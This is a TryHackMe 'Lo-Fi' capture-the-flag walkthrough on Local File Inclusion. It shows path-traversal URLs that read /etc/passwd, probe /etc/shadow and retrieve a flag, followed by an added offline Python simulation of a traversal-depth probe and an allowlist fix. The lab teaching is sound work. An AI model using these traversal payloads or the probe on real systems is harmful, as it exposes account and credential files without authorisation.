Solving TryHackMe's "Lo-Fi" Room - A Complete Walkthrough
Emanuele



Publish Date: Jun 18

🧭 Introduction
In this post, I’ll walk you through my experience solving the Lo-Fi room on TryHackMe. The room sits in the Challenges section and is well suited to beginners who want to understand Local File Inclusion (LFI) through path traversal, and how attackers abuse an unvalidated file-inclusion parameter in a web application.

🧩 Room Breakdown
Start by browsing to the IP address shown in the challenge. A small blog-style application is running there. The task asks us to keep an eye on the URL bar and note how the URL changes as we click the links next to the video.

(screenshot: first look at the blog application)

Let's click the first link, called Relax, and watch the URL change.

(screenshot: the URL after clicking Relax)

The URL parameter suggests that the site is using PHP file inclusion. If the parameter value is not validated, this leads to Local File Inclusion (LFI): by stepping up the directory tree with ../ we can make the server include files outside the web root. Two classic targets:

  • /etc/passwd: contains user account info (username, UID, home directory, shell). Passwords used to be stored here but now live in:

  • /etc/shadow: contains the password hashes and is readable only by root, so it is also a quick test of which user the web server runs as.

Let's craft a URL that points the page parameter at the passwd file.

http://10.10.136.146/?page=../etc/passwd

(screenshot: first attempt, no luck)

(screenshot: second attempt, no luck)

TIP: the number of ../ segments you need depends on how deep the directory the application includes from sits in the filesystem; in practice it takes between two and five copies of ../ before etc/passwd to reach the real file. Overshooting is harmless, because .. at the root directory stays at the root, so if in doubt add more rather than fewer.

(screenshot: /etc/passwd returned by the application)

Great, that is the first file. Now use the same path but request the shadow file instead. I expect a blank result: the web server does not run as root, so it cannot read /etc/shadow.

(screenshot: blank response for /etc/shadow)

As expected, nothing comes back: the web server's user is not root, so that file stays out of reach. Let's dig for the flag instead, assuming it is named flag.txt and sits a few directories up.

http://10.10.136.146/?page=../../../flag.txt

(screenshot: flag.txt returned by the application)

Good, we've got the flag on the first try!
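The whole chain above (find the traversal depth, read /etc/passwd, get nothing back for /etc/shadow, then pull the flag), as an added example that is not part of the original post or of the room. It simulates the target offline: the page parameter, the include directory /var/www/html/pages, the web-server user www-data and the fake filesystem are all assumptions I made so the script runs without a network; it also goes one step beyond the walkthrough by showing the allowlist fix that stops the attack. Swap fake_fetch for a real HTTP request only against a target you are authorised to test.

```python
"""Simulated LFI path-traversal probe.

Added example, not part of the original walkthrough or the room. The
`page` parameter, the include base /var/www/html/pages, the server user
and the fake filesystem are constructed assumptions so the script runs
offline; replace fake_fetch() with a real HTTP GET against a lab target
you are authorised to test.
"""
import posixpath
from typing import Callable, Optional

# Constructed stand-in for the target's filesystem:
# absolute path -> (owner, world_readable, content)
FAKE_FS = {
    "/etc/passwd": ("root", True,
                    "root:x:0:0:root:/root:/bin/bash\n"
                    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"),
    "/etc/shadow": ("root", False, "root:$6$constructed$hash:19000:0:99999:7:::\n"),
    "/flag.txt": ("root", True, "THM{constructed_flag_for_this_example}\n"),
    "/var/www/html/pages/relax.php": ("www-data", True, "<?php echo 'relax'; ?>\n"),
}
INCLUDE_BASE = "/var/www/html/pages"   # assumed: directory include() is relative to
SERVER_USER = "www-data"               # assumed: user the PHP process runs as

Fetch = Callable[[str], str]


def resolve(include_base: str, page: str) -> str:
    """Mimic include($include_base . '/' . $page): join, then collapse '..'.
    normpath, like the kernel, clamps '..' at '/', so extra '../'
    segments beyond the real depth are harmless."""
    return posixpath.normpath(posixpath.join(include_base, page))


def fake_fetch(page: str) -> str:
    """Stand-in for GET /?page=<page> on the vulnerable app.
    Returns the included file's text, or '' when PHP would include nothing
    (file missing, or not readable by the web server user)."""
    entry = FAKE_FS.get(resolve(INCLUDE_BASE, page))
    if entry is None:
        return ""
    owner, world_readable, content = entry
    if owner != SERVER_USER and not world_readable:
        return ""                      # e.g. /etc/shadow: root-only, so blank
    return content


def looks_like_passwd(body: str) -> bool:
    """The root entry is a reliable marker that /etc/passwd was included."""
    return "root:x:0:0:" in body


def find_depth(fetch: Fetch, max_depth: int = 8) -> Optional[int]:
    """Prepend 1..max_depth copies of '../' to etc/passwd until the response
    looks like the real file. The answer is the depth of the include base."""
    for depth in range(1, max_depth + 1):
        if looks_like_passwd(fetch("../" * depth + "etc/passwd")):
            return depth
    return None


def read_file(fetch: Fetch, depth: int, absolute_path: str) -> str:
    """Read any absolute path through the LFI once the depth is known."""
    return fetch("../" * depth + absolute_path.lstrip("/"))


ALLOWED_PAGES = {"relax.php"}          # assumed page names for the fixed app


def hardened_fetch(page: str) -> str:
    """Defensive counterpart: accept only names from a fixed allowlist, so
    a traversal string never reaches include() at all."""
    if page not in ALLOWED_PAGES:
        return ""
    return fake_fetch(page)


if __name__ == "__main__":
    depth = find_depth(fake_fetch)
    if depth is None:
        raise SystemExit("no traversal depth worked; not vulnerable or filtered")
    print("include base depth:", depth)              # 4 for /var/www/html/pages
    for path in ("/etc/passwd", "/etc/shadow", "/flag.txt"):
        body = read_file(fake_fetch, depth, path)
        print(f"{path}: {body.strip() or '(blank: not readable or missing)'}")
    print("hardened app leaks passwd:", find_depth(hardened_fetch) is not None)
```

The probe stops at the first depth that returns a recognisable /etc/passwd; because .. is clamped at /, every larger depth would work too, which is why the "two to five ../" rule of thumb holds. The hardened variant shows the fix that matters: never pass user input to include(), map a fixed set of names to files instead.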

📌 Final Thoughts
The Lo-Fi room is a short, focused exercise in spotting a suspicious URL parameter and turning it into file reads through LFI. It is a good way to sharpen basic web exploitation skills for CTFs.
